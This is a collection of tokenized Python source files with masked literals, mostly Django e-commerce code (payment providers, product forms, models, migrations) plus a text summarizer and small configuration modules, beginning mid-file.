rebuild_with_force : <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> else : <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' </s>
<s> import re , os <EOL> from . import VCSRoute , ROUTE_REGEX <EOL> from pip . vcs . mercurial import Mercurial <EOL> class MercurialRoute ( VCSRoute ) : <EOL> '''<STR_LIT>''' <EOL> vcs = Mercurial <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" <EOL> def _uid ( self , identifier ) : <EOL> pattern_re = re . compile ( '<STR_LIT>' % ROUTE_REGEX ) <EOL> pattern_match = pattern_re . search ( identifier ) <EOL> pattern_info = pattern_match . groupdict ( ) <EOL> return "<STR_LIT>" % ( pattern_info [ '<STR_LIT>' ] , pattern_info [ '<STR_LIT>' ] ) </s>
<s> from __future__ import unicode_literals <EOL> import hashlib <EOL> import json <EOL> from decimal import Decimal <EOL> from unittest import TestCase <EOL> from django . http import HttpResponse , HttpResponseForbidden <EOL> from mock import MagicMock , patch <EOL> from . import CoinbaseProvider <EOL> PAYMENT_TOKEN = '<STR_LIT>' <EOL> KEY = '<STR_LIT>' <EOL> SECRET = '<STR_LIT>' <EOL> VARIANT = '<STR_LIT>' <EOL> COINBASE_REQUEST = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { '<STR_LIT:id>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : hashlib . md5 ( ( '<STR_LIT>' % ( <EOL> PAYMENT_TOKEN , KEY ) ) . encode ( '<STR_LIT:utf-8>' ) ) . hexdigest ( ) } } <EOL> class Payment ( object ) : <EOL> id = <NUM_LIT:1> <EOL> description = '<STR_LIT>' <EOL> currency = '<STR_LIT>' <EOL> total = Decimal ( <NUM_LIT:100> ) <EOL> status = '<STR_LIT>' <EOL> token = PAYMENT_TOKEN <EOL> variant = VARIANT <EOL> def change_status ( self , status ) : <EOL> self . status = status <EOL> def get_failure_url ( self ) : <EOL> return '<STR_LIT>' <EOL> def get_process_url ( self ) : <EOL> return '<STR_LIT>' <EOL> def get_purchased_items ( self ) : <EOL> return [ ] <EOL> def save ( self ) : <EOL> return self <EOL> def get_success_url ( self ) : <EOL> return '<STR_LIT>' <EOL> class TestCoinbaseProvider ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . payment = Payment ( ) <EOL> self . provider = CoinbaseProvider ( key = KEY , secret = SECRET ) <EOL> def test_process_data ( self ) : <EOL> """<STR_LIT>""" <EOL> request = MagicMock ( ) <EOL> request . body = json . dumps ( COINBASE_REQUEST ) <EOL> response = self . provider . process_data ( self . payment , request ) <EOL> self . assertEqual ( type ( response ) , HttpResponse ) <EOL> self . assertEqual ( self . payment . status , '<STR_LIT>' ) <EOL> def test_incorrect_custom_token_process_data ( self ) : <EOL> """<STR_LIT>""" <EOL> data = dict ( COINBASE_REQUEST ) <EOL> data . 
update ( { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> request = MagicMock ( ) <EOL> request . body = json . dumps ( data ) <EOL> response = self . provider . process_data ( self . payment , request ) <EOL> self . assertEqual ( type ( response ) , HttpResponseForbidden ) <EOL> def test_incorrect_data_process_data ( self ) : <EOL> """<STR_LIT>""" <EOL> request = MagicMock ( ) <EOL> request . POST = { '<STR_LIT:id>' : '<STR_LIT>' } <EOL> response = self . provider . process_data ( self . payment , request ) <EOL> self . assertEqual ( type ( response ) , HttpResponseForbidden ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_provider_returns_checkout_url ( self , mocked_post , mocked_time ) : <EOL> code = '<STR_LIT>' <EOL> signature = '<STR_LIT>' '<STR_LIT>' <EOL> url = '<STR_LIT>' % code <EOL> post = MagicMock ( ) <EOL> post . json = MagicMock ( return_value = { '<STR_LIT>' : { '<STR_LIT:code>' : code } } ) <EOL> post . status_code = <NUM_LIT:200> <EOL> mocked_post . return_value = post <EOL> mocked_time . return_value = <NUM_LIT:1> <EOL> form = self . provider . get_form ( self . payment ) <EOL> self . assertEqual ( form . action , url ) <EOL> self . assertEqual ( <EOL> mocked_post . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , signature ) </s>
<s> from __future__ import unicode_literals <EOL> import time <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . http import HttpResponseForbidden , HttpResponse <EOL> import jwt <EOL> from . forms import PaymentForm , ProcessPaymentForm <EOL> from . . core import BasicProvider <EOL> class GoogleWalletProvider ( BasicProvider ) : <EOL> def __init__ ( self , seller_id , seller_secret , <EOL> library = '<STR_LIT>' , <EOL> ** kwargs ) : <EOL> self . seller_id = seller_id <EOL> self . seller_secret = seller_secret <EOL> self . library = library <EOL> super ( GoogleWalletProvider , self ) . __init__ ( ** kwargs ) <EOL> if not self . _capture : <EOL> raise ImproperlyConfigured ( <EOL> '<STR_LIT>' ) <EOL> def get_jwt_data ( self , payment ) : <EOL> current_time = int ( time . time ( ) ) <EOL> exp_time = current_time + <NUM_LIT> <EOL> jwt_info = { <EOL> '<STR_LIT>' : self . seller_id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : current_time , <EOL> '<STR_LIT>' : exp_time , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : payment . currency , <EOL> '<STR_LIT>' : str ( payment . total ) , <EOL> '<STR_LIT:name>' : payment . description or '<STR_LIT>' , <EOL> '<STR_LIT>' : payment . token } } <EOL> return jwt . encode ( jwt_info , self . seller_secret ) <EOL> def get_form ( self , payment , data = None ) : <EOL> kwargs = { <EOL> '<STR_LIT:data>' : data , <EOL> '<STR_LIT>' : payment , <EOL> '<STR_LIT>' : self , <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } <EOL> return PaymentForm ( ** kwargs ) <EOL> def get_process_form ( self , payment , request ) : <EOL> return ProcessPaymentForm ( payment = payment , provider = self , <EOL> data = request . POST or None ) <EOL> def get_token_from_request ( self , payment , request ) : <EOL> form = self . get_process_form ( payment , request ) <EOL> if form . is_valid ( ) : <EOL> return form . 
token <EOL> def process_data ( self , payment , request ) : <EOL> form = self . get_process_form ( payment , request ) <EOL> if not form . is_valid ( ) : <EOL> return HttpResponseForbidden ( '<STR_LIT>' ) <EOL> form . save ( ) <EOL> return HttpResponse ( form . order_id ) </s>
<s> from django . core . management . base import BaseCommand <EOL> from django . db import connection <EOL> from ... . userprofile . models import User <EOL> from ... utils . random_data import ( <EOL> create_items , create_orders , create_users , create_shipping_methods ) <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> placeholders_dir = r'<STR_LIT>' <EOL> def add_arguments ( self , parser ) : <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) <EOL> def make_database_faster ( self ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in connection . settings_dict [ '<STR_LIT>' ] : <EOL> cursor = connection . cursor ( ) <EOL> cursor . execute ( '<STR_LIT>' ) <EOL> cursor . execute ( '<STR_LIT>' ) <EOL> def handle ( self , * args , ** options ) : <EOL> self . make_database_faster ( ) <EOL> create_images = not options [ '<STR_LIT>' ] <EOL> for msg in create_shipping_methods ( ) : <EOL> self . stdout . write ( msg ) <EOL> for msg in create_items ( self . placeholders_dir , <NUM_LIT> , create_images ) : <EOL> self . stdout . write ( msg ) <EOL> for msg in create_users ( <NUM_LIT:20> ) : <EOL> self . stdout . write ( msg ) <EOL> for msg in create_orders ( <NUM_LIT:20> ) : <EOL> self . stdout . write ( msg ) <EOL> if options [ '<STR_LIT>' ] : <EOL> credentials = { '<STR_LIT:email>' : '<STR_LIT>' , '<STR_LIT:password>' : '<STR_LIT>' } <EOL> user , created = User . objects . get_or_create ( <EOL> email = credentials [ '<STR_LIT:email>' ] , defaults = { <EOL> '<STR_LIT>' : True , '<STR_LIT>' : True , '<STR_LIT>' : True } ) <EOL> if created : <EOL> user . set_password ( credentials [ '<STR_LIT:password>' ] ) <EOL> user . save ( ) <EOL> self . stdout . 
write ( <EOL> '<STR_LIT>' % credentials ) <EOL> else : <EOL> self . stdout . write ( <EOL> '<STR_LIT>' % credentials ) </s>
<s> from __future__ import unicode_literals <EOL> from django import forms <EOL> from django . db import transaction <EOL> from django . forms . models import ModelChoiceIterator , inlineformset_factory <EOL> from django . utils . translation import pgettext_lazy <EOL> from ... product . models import ( AttributeChoiceValue , Product , ProductAttribute , <EOL> ProductImage , ProductVariant , Stock , <EOL> VariantImage ) <EOL> from . widgets import ImagePreviewWidget <EOL> PRODUCT_CLASSES = { Product : '<STR_LIT>' } <EOL> class ProductClassForm ( forms . Form ) : <EOL> product_cls = forms . ChoiceField ( <EOL> label = pgettext_lazy ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> widget = forms . RadioSelect , <EOL> choices = [ ( cls . __name__ , presentation ) for cls , presentation in <EOL> PRODUCT_CLASSES . items ( ) ] ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ProductClassForm , self ) . __init__ ( * args , ** kwargs ) <EOL> product_class = next ( iter ( ( PRODUCT_CLASSES ) ) ) <EOL> self . fields [ '<STR_LIT>' ] . initial = product_class . __name__ <EOL> class StockForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = Stock <EOL> exclude = [ '<STR_LIT>' ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> product = kwargs . pop ( '<STR_LIT>' ) <EOL> super ( StockForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] = forms . ModelChoiceField ( <EOL> queryset = product . variants ) <EOL> class ProductForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = Product <EOL> exclude = [ ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ProductForm , self ) . __init__ ( * args , ** kwargs ) <EOL> field = self . fields [ '<STR_LIT:name>' ] <EOL> field . widget . attrs [ '<STR_LIT>' ] = pgettext_lazy ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> field = self . fields [ '<STR_LIT>' ] <EOL> field . widget . 
attrs [ '<STR_LIT>' ] = pgettext_lazy ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> field = self . fields [ '<STR_LIT>' ] <EOL> field . widget . attrs [ '<STR_LIT>' ] = pgettext_lazy ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> class ProductVariantForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = ProductVariant <EOL> exclude = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ProductVariantForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs [ <EOL> '<STR_LIT>' ] = self . instance . product . price . gross <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs [ <EOL> '<STR_LIT>' ] = self . instance . product . weight <EOL> class CachingModelChoiceIterator ( ModelChoiceIterator ) : <EOL> def __iter__ ( self ) : <EOL> if self . field . empty_label is not None : <EOL> yield ( '<STR_LIT>' , self . field . empty_label ) <EOL> for obj in self . queryset : <EOL> yield self . choice ( obj ) <EOL> class CachingModelChoiceField ( forms . ModelChoiceField ) : <EOL> def _get_choices ( self ) : <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> return self . _choices <EOL> return CachingModelChoiceIterator ( self ) <EOL> choices = property ( _get_choices , forms . ChoiceField . _set_choices ) <EOL> class VariantAttributeForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = ProductVariant <EOL> fields = [ ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( VariantAttributeForm , self ) . __init__ ( * args , ** kwargs ) <EOL> attrs = self . instance . product . attributes . all ( ) <EOL> self . available_attrs = attrs . prefetch_related ( '<STR_LIT>' ) <EOL> for attr in self . available_attrs : <EOL> field_defaults = { '<STR_LIT:label>' : attr . display , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : self . instance . get_attribute ( attr . pk ) } <EOL> if attr . has_values ( ) : <EOL> field = CachingModelChoiceField ( <EOL> queryset = attr . 
values . all ( ) , ** field_defaults ) <EOL> else : <EOL> field = forms . CharField ( ** field_defaults ) <EOL> self . fields [ attr . get_formfield_name ( ) ] = field <EOL> def save ( self , commit = True ) : <EOL> attributes = { } <EOL> for attr in self . available_attrs : <EOL> value = self . cleaned_data . pop ( attr . get_formfield_name ( ) ) <EOL> attributes [ attr . pk ] = value . pk if hasattr ( value , '<STR_LIT>' ) else value <EOL> self . instance . attributes = attributes <EOL> return super ( VariantAttributeForm , self ) . save ( commit = commit ) <EOL> class VariantBulkDeleteForm ( forms . Form ) : <EOL> items = forms . ModelMultipleChoiceField ( queryset = ProductVariant . objects ) <EOL> def delete ( self ) : <EOL> items = ProductVariant . objects . filter ( <EOL> pk__in = self . cleaned_data [ '<STR_LIT>' ] ) <EOL> items . delete ( ) <EOL> class StockBulkDeleteForm ( forms . Form ) : <EOL> items = forms . ModelMultipleChoiceField ( queryset = Stock . objects ) <EOL> def delete ( self ) : <EOL> items = Stock . objects . filter ( pk__in = self . cleaned_data [ '<STR_LIT>' ] ) <EOL> items . delete ( ) <EOL> class ProductImageForm ( forms . ModelForm ) : <EOL> variants = forms . ModelMultipleChoiceField ( <EOL> queryset = ProductVariant . objects . none ( ) , <EOL> widget = forms . CheckboxSelectMultiple , required = False ) <EOL> class Meta : <EOL> model = ProductImage <EOL> exclude = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ProductImageForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if self . instance . product : <EOL> variants = self . fields [ '<STR_LIT>' ] <EOL> variants . queryset = self . instance . product . variants . all ( ) <EOL> variants . initial = self . instance . variant_images . values_list ( <EOL> '<STR_LIT>' , flat = True ) <EOL> if self . instance . image : <EOL> self . fields [ '<STR_LIT:image>' ] . widget = ImagePreviewWidget ( ) <EOL> @ transaction . 
atomic <EOL> def save_variant_images ( self , instance ) : <EOL> variant_images = [ ] <EOL> instance . variant_images . all ( ) . delete ( ) <EOL> for variant in self . cleaned_data [ '<STR_LIT>' ] : <EOL> variant_images . append ( <EOL> VariantImage ( variant = variant , image = instance ) ) <EOL> VariantImage . objects . bulk_create ( variant_images ) <EOL> def save ( self , commit = True ) : <EOL> instance = super ( ProductImageForm , self ) . save ( commit = commit ) <EOL> self . save_variant_images ( instance ) <EOL> return instance <EOL> class ProductAttributeForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = ProductAttribute <EOL> exclude = [ ] <EOL> AttributeChoiceValueFormset = inlineformset_factory ( <EOL> ProductAttribute , AttributeChoiceValue , exclude = ( ) , extra = <NUM_LIT:1> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> import django_prices . models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . RenameField ( <EOL> model_name = '<STR_LIT>' , <EOL> old_name = '<STR_LIT>' , <EOL> new_name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = django_prices . models . PriceField ( decimal_places = <NUM_LIT:2> , currency = b'<STR_LIT>' , max_digits = <NUM_LIT:12> , blank = True , null = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( default = '<STR_LIT>' , max_length = <NUM_LIT:255> , db_index = True , blank = True ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( default = '<STR_LIT>' , max_length = <NUM_LIT:255> , blank = True ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models <EOL> from django . db . models import Max , F <EOL> from django . utils . translation import pgettext_lazy <EOL> from versatileimagefield . fields import VersatileImageField , PPOIField <EOL> from . base import Product <EOL> class ImageManager ( models . Manager ) : <EOL> def first ( self ) : <EOL> try : <EOL> return self . get_queryset ( ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> pass <EOL> class ProductImage ( models . Model ) : <EOL> product = models . ForeignKey ( Product , related_name = '<STR_LIT>' ) <EOL> image = VersatileImageField ( <EOL> upload_to = '<STR_LIT>' , ppoi_field = '<STR_LIT>' , blank = False ) <EOL> ppoi = PPOIField ( ) <EOL> alt = models . CharField ( <EOL> pgettext_lazy ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> max_length = <NUM_LIT> , blank = True ) <EOL> order = models . PositiveIntegerField ( editable = False ) <EOL> objects = ImageManager ( ) <EOL> class Meta : <EOL> ordering = [ '<STR_LIT>' ] <EOL> app_label = '<STR_LIT>' <EOL> def get_ordering_queryset ( self ) : <EOL> return self . product . images . all ( ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> if self . order is None : <EOL> qs = self . get_ordering_queryset ( ) <EOL> existing_max = qs . aggregate ( Max ( '<STR_LIT>' ) ) <EOL> existing_max = existing_max . get ( '<STR_LIT>' ) <EOL> self . order = <NUM_LIT:0> if existing_max is None else existing_max + <NUM_LIT:1> <EOL> super ( ProductImage , self ) . save ( * args , ** kwargs ) <EOL> def delete ( self , * args , ** kwargs ) : <EOL> qs = self . get_ordering_queryset ( ) <EOL> qs . filter ( order__gt = self . order ) . update ( order = F ( '<STR_LIT>' ) - <NUM_LIT:1> ) <EOL> super ( ProductImage , self ) . delete ( * args , ** kwargs ) <EOL> class VariantImage ( models . Model ) : <EOL> variant = models . ForeignKey ( '<STR_LIT>' , <EOL> related_name = '<STR_LIT>' ) <EOL> image = models . 
ForeignKey ( ProductImage , related_name = '<STR_LIT>' ) </s>
<s> from django . core . exceptions import ImproperlyConfigured <EOL> from django . test import TestCase <EOL> from django . test . client import RequestFactory <EOL> from django . test . utils import override_settings <EOL> from responsive . conf import settings <EOL> from responsive . context_processors import device <EOL> from responsive . utils import Device <EOL> class ContextProcessorsTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . factory = RequestFactory ( ) <EOL> def test_context_processor_raises_improperlyconfigured_error ( self ) : <EOL> request = self . factory . get ( '<STR_LIT:/>' ) <EOL> self . assertRaises ( ImproperlyConfigured , device , request ) <EOL> @ override_settings ( MIDDLEWARE_CLASSES = ( '<STR_LIT>' , ) ) <EOL> def test_context_processor_returns_device_object ( self ) : <EOL> request = self . factory . get ( '<STR_LIT:/>' ) <EOL> context = device ( request ) <EOL> self . assertIsInstance ( context [ settings . RESPONSIVE_VARIABLE_NAME ] , Device ) </s>
<s> from django import forms , template <EOL> from users . fields import HoneyPotField <EOL> register = template . Library ( ) <EOL> @ register . filter <EOL> def is_checkbox ( field ) : <EOL> return isinstance ( field . field . widget , forms . CheckboxInput ) <EOL> @ register . filter <EOL> def input_class ( field ) : <EOL> """<STR_LIT>""" <EOL> return field . field . widget . __class__ . __name__ . lower ( ) <EOL> @ register . filter <EOL> def is_honeypot ( field ) : <EOL> return isinstance ( field . field , HoneyPotField ) </s>
<s> from __future__ import unicode_literals <EOL> from django . conf import settings <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from appconf import AppConf <EOL> class DjangoCMSFormsConf ( AppConf ) : <EOL> PLUGIN_MODULE = _ ( '<STR_LIT>' ) <EOL> PLUGIN_NAME = _ ( '<STR_LIT>' ) <EOL> FIELDSETS = None <EOL> FILE_STORAGE_DIR = '<STR_LIT>' <EOL> FILE_STORAGE = settings . DEFAULT_FILE_STORAGE <EOL> ALLOWED_FILE_TYPES = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> MAX_UPLOAD_SIZE = <NUM_LIT> <EOL> FIELD_TYPES = ( <EOL> ( '<STR_LIT:text>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:email>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:url>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:file>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:date>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:time>' , _ ( 
'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:password>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ) <EOL> DEFAULT_FIELD_TYPE = '<STR_LIT:text>' <EOL> SPAM_PROTECTIONS = ( <EOL> ( <NUM_LIT:0> , _ ( '<STR_LIT:None>' ) ) , <EOL> ( <NUM_LIT:1> , _ ( '<STR_LIT>' ) ) , <EOL> ( <NUM_LIT:2> , _ ( '<STR_LIT>' ) ) , <EOL> ) <EOL> DEFAULT_SPAM_PROTECTION = <NUM_LIT:0> <EOL> RECAPTCHA_PUBLIC_KEY = '<STR_LIT>' <EOL> RECAPTCHA_SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATES = ( <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ) <EOL> DEFAULT_TEMPLATE = '<STR_LIT>' <EOL> DATETIME_FORMAT = '<STR_LIT>' <EOL> EXPORT_FILENAME = '<STR_LIT>' <EOL> HASHIDS_SALT = settings . SECRET_KEY <EOL> USE_HTML5_REQUIRED = False <EOL> WIDGET_CSS_CLASSES = { } <EOL> class Meta : <EOL> prefix = '<STR_LIT>' </s>
<s> from __future__ import absolute_import <EOL> from __future__ import division , print_function , unicode_literals <EOL> from . . models import TfDocumentModel as TfModel <EOL> def cosine_similarity ( evaluated_model , reference_model ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( evaluated_model , TfModel ) and isinstance ( reference_model , TfModel ) ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> terms = frozenset ( evaluated_model . terms ) | frozenset ( reference_model . terms ) <EOL> numerator = <NUM_LIT:0.0> <EOL> for term in terms : <EOL> numerator += evaluated_model . term_frequency ( term ) * reference_model . term_frequency ( term ) <EOL> denominator = evaluated_model . magnitude * reference_model . magnitude <EOL> if denominator == <NUM_LIT:0.0> : <EOL> raise ValueError ( "<STR_LIT>" % ( <EOL> evaluated_model , reference_model ) ) <EOL> return numerator / denominator <EOL> def unit_overlap ( evaluated_model , reference_model ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( evaluated_model , TfModel ) and isinstance ( reference_model , TfModel ) ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> terms1 = frozenset ( evaluated_model . terms ) <EOL> terms2 = frozenset ( reference_model . terms ) <EOL> if not terms1 and not terms2 : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> common_terms_count = len ( terms1 & terms2 ) <EOL> return common_terms_count / ( len ( terms1 ) + len ( terms2 ) - common_terms_count ) </s>
<s> from __future__ import absolute_import <EOL> from __future__ import division , print_function , unicode_literals <EOL> import math <EOL> from . _summarizer import AbstractSummarizer <EOL> from . . utils import get_stop_words <EOL> class SumBasicSummarizer ( AbstractSummarizer ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , document , sentences_count ) : <EOL> sentences = document . sentences <EOL> ratings = self . _compute_ratings ( sentences ) <EOL> return self . _get_best_sentences ( document . sentences , sentences_count , ratings ) <EOL> def _get_all_words_in_doc ( self , sentences ) : <EOL> return [ w for s in sentences for w in s . words ] <EOL> def _get_content_words_in_sentence ( self , sentence ) : <EOL> normalized_words = self . _normalize_words ( sentence . words ) <EOL> normalized_content_words = self . _filter_out_stop_words ( normalized_words ) <EOL> return normalized_content_words <EOL> def _normalize_words ( self , words ) : <EOL> return [ self . normalize_word ( w ) for w in words ] <EOL> def _filter_out_stop_words ( self , words ) : <EOL> return [ w for w in words if w not in self . stop_words ] <EOL> def _compute_word_freq ( self , list_of_words ) : <EOL> word_freq = { } <EOL> for w in list_of_words : <EOL> word_freq [ w ] = word_freq . get ( w , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> return word_freq <EOL> def _get_all_content_words_in_doc ( self , sentences ) : <EOL> all_words = self . _get_all_words_in_doc ( sentences ) <EOL> content_words = self . _filter_out_stop_words ( all_words ) <EOL> normalized_content_words = self . _normalize_words ( content_words ) <EOL> return normalized_content_words <EOL> def _compute_tf ( self , sentences ) : <EOL> '''<STR_LIT>''' <EOL> content_words = self . _get_all_content_words_in_doc ( sentences ) <EOL> content_words_count = len ( content_words ) <EOL> content_words_freq = self . 
_compute_word_freq ( content_words ) <EOL> content_word_tf = dict ( ( k , v / content_words_count ) for ( k , v ) in content_words_freq . items ( ) ) <EOL> return content_word_tf <EOL> def _compute_average_probability_of_words ( self , word_freq_in_doc , content_words_in_sentence ) : <EOL> content_words_count = len ( content_words_in_sentence ) <EOL> if content_words_count > <NUM_LIT:0> : <EOL> word_freq_sum = sum ( [ word_freq_in_doc [ w ] for w in content_words_in_sentence ] ) <EOL> word_freq_avg = word_freq_sum / content_words_count <EOL> return word_freq_avg <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def _update_tf ( self , word_freq , words_to_update ) : <EOL> for w in words_to_update : <EOL> word_freq [ w ] *= word_freq [ w ] <EOL> return word_freq <EOL> def _find_index_of_best_sentence ( self , word_freq , sentences_as_words ) : <EOL> min_possible_freq = - <NUM_LIT:1> <EOL> max_value = min_possible_freq <EOL> best_sentence_index = <NUM_LIT:0> <EOL> for i , words in enumerate ( sentences_as_words ) : <EOL> word_freq_avg = self . _compute_average_probability_of_words ( word_freq , words ) <EOL> if ( word_freq_avg > max_value ) : <EOL> max_value = word_freq_avg <EOL> best_sentence_index = i <EOL> return best_sentence_index <EOL> def _compute_ratings ( self , sentences ) : <EOL> word_freq = self . _compute_tf ( sentences ) <EOL> ratings = { } <EOL> sentences_list = list ( sentences ) <EOL> sentences_as_words = [ self . _get_content_words_in_sentence ( s ) for s in sentences ] <EOL> while len ( sentences_list ) > <NUM_LIT:0> : <EOL> best_sentence_index = self . _find_index_of_best_sentence ( word_freq , sentences_as_words ) <EOL> best_sentence = sentences_list . pop ( best_sentence_index ) <EOL> ratings [ best_sentence ] = - <NUM_LIT:1> * len ( ratings ) <EOL> best_sentence_words = sentences_as_words . pop ( best_sentence_index ) <EOL> self . _update_tf ( word_freq , best_sentence_words ) <EOL> return ratings </s>
<s> SCHEMA_APIS = '<STR_LIT>' <EOL> SCHEMA_PATH = '<STR_LIT:path>' <EOL> FILE_EXT_JSON = '<STR_LIT>' <EOL> FILE_EXT_YAML = '<STR_LIT>' <EOL> SWAGGER_FILE_NAMES = [ <EOL> '<STR_LIT>' + '<STR_LIT:.>' + FILE_EXT_JSON , <EOL> '<STR_LIT>' + '<STR_LIT:.>' + FILE_EXT_JSON , <EOL> '<STR_LIT>' + '<STR_LIT:.>' + FILE_EXT_YAML , <EOL> ] <EOL> SCOPE_SEPARATOR = '<STR_LIT>' </s>
